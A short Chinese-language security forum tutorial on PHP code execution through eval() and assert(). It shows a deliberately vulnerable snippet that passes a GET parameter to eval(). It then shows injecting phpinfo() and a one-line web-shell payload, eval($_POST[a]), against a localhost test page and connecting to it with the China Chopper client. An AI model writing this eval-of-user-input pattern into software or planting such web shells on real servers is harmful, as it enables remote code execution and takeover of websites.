K8安全团队
查看: 821|回复: 0

php代码执行漏洞

[复制链接]
  • TA的每日心情
    开心
    2017-6-13 17:07
  • 签到天数: 7 天

    [LV.3]偶尔看看II

    发表于 2017-12-5 11:12:21 | 显示全部楼层 |阅读模式

    马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

    您需要 登录 才可以下载或查看,没有帐号?注册

    x
    php代码执行的两个函数eval(),assert()

    [PHP] 纯文本查看 复制代码
    <?php
        $i = $_GET['x'];
        eval($i);
    ?>

    eval()函数将以php类型执行传入的参数x的值
    给x传入一个phpinfo();,执行
    给x传入一个php一句话代码,http://localhost/test/eval/eval.php?x=eval($_POST[a]);
    用菜刀连接
    连接成功
    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    Powered by Discuz! X3.2 © 2001-2016 Comsenz Inc.

    返回顶部